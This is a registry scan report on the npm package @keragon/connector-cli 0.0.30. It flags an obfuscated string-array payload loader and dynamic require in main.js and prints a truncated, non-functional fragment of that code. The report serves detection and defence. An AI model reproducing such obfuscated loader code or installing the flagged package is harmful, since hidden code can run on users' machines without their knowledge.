registry  /  @keragon/connector-cli  /  0.0.30

@keragon/connector-cli@0.0.30

Keragon connector CLI

Static Scan Results

scanned 8d ago · by rust-scanner

Static analysis flagged 7 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
CryptoDynamicRequireFilesystem
Supply chain
HighEntropyStringsMinifiedObfuscatedTrivial
Manifest
NoLicense
scanned 2 file(s), 479 KB of source

Source & flagged code

2 flagged · loading source
main.jsView file
1#!/usr/bin/env node L2: const _0x3557a0=_0x5f22;(function(_0x439395,_0x382722){const _0x1d86e8=_0x5f22,_0x31997a=_0x439395();while(!![]){try{const _0x9b5895=parseInt(_0x1d86e8(0x75f))/(-0x8f3+0x37*0x52+-0...
High
Obfuscated Payload Loader

Source contains an obfuscator-style string-array loader that reconstructs and executes hidden code.

main.jsView on unpkg · L1
1#!/usr/bin/env node L2: const _0x3557a0=_0x5f22;(function(_0x439395,_0x382722){const _0x1d86e8=_0x5f22,_0x31997a=_0x439395();while(!![]){try{const _0x9b5895=parseInt(_0x1d86e8(0x75f))/(-0x8f3+0x37*0x52+-0...
Medium
Dynamic Require

Package source references dynamic require/import behavior.

main.jsView on unpkg · L1

Findings

2 High2 Medium3 Low
HighObfuscated Payload Loadermain.js
HighObfuscated
MediumDynamic Requiremain.js
MediumStructural Risk Force Deep Review
LowFilesystem
LowHigh Entropy Strings
LowNo License